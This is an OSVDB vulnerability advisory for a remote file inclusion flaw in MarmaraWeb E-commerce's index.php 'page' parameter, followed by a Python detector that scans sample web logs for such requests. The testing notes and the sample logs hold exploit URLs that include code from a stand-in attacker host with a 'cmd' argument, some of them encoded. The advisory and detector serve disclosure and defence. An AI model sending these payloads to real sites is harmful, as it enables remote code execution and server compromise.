MarmaraWeb E-commerce index.php page Variable Arbitrary Command Execution

2005-12-15T18:17:46
ID OSVDB:21903
Type osvdb
Reporter B3g0k(B3g0k@hackermail.com)
Modified 2005-12-15T18:17:46

Description

Vulnerability Description

MarmaraWeb E-commerce contains a flaw that allows a remote arbitrary code execution attack. This flaw exists because the application does not validate the 'page' variable upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

MarmaraWeb E-commerce contains a flaw that allows a remote arbitrary code execution attack. This flaw exists because the application does not validate the 'page' variable upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code, leading to a loss of integrity.

Manual Testing Notes

http://[target]/index.php?page=http://yourevilcode?&cmd=
http://[target]/?page=http://yourevilcode?&cmd=
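
The request pattern in the testing notes, as an added detection example that is not part of the OSVDB record: a Python scan over constructed web-server access-log lines that flags requests to index.php (or the site root) whose `page` parameter resolves to a remote URL, including percent-encoded and double-encoded variants. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Schemes PHP's include() would fetch remotely when allow_url_include is enabled.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?)://", re.IGNORECASE)

# Constructed sample access-log lines (not from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Dec/2005:18:17:46 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [15/Dec/2005:18:18:01 +0000] "GET /index.php?page=http://yourevilcode?&cmd=id HTTP/1.1" 200 88
203.0.113.9 - - [15/Dec/2005:18:18:07 +0000] "GET /?page=%68%74%74%70%3a%2f%2fyourevilcode%3F&cmd=ls HTTP/1.1" 200 88
203.0.113.9 - - [15/Dec/2005:18:18:12 +0000] "GET /index.php?page=%2568ttp%253A%252F%252Fevil HTTP/1.1" 200 88
198.51.100.2 - - [15/Dec/2005:18:19:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 400
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %2568ttp becomes http."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_remote_include_attempt(target):
    """True if the request hits index.php or the root with a `page` value that
    resolves to a remote URL, i.e. the RFI pattern in the testing notes."""
    parts = urlsplit(target)
    if parts.path not in ("/", "/index.php"):
        return False
    # parse_qs decodes one layer; fully_decode catches double-encoded payloads.
    for page in parse_qs(parts.query, keep_blank_values=True).get("page", []):
        if REMOTE_SCHEME.match(fully_decode(page)):
            return True
    return False

def find_rfi_attempts(log_text):
    """Return (ip, request target) for every log line matching the signature."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_remote_include_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits

if __name__ == "__main__":
    for ip, target in find_rfi_attempts(SAMPLE_LOG):
        print(f"possible remote file inclusion attempt from {ip}: {target}")
```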

References:

Vendor URL: http://www.marmaraweb.com/referanslar.php#eticaret
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0185.html
Generic Exploit URL: http://packetstormsecurity.org/0512-exploits/marmaraXSS.txt
CVE-2005-4287
Bugtraq ID: 15875
Bugtraq ID: 15877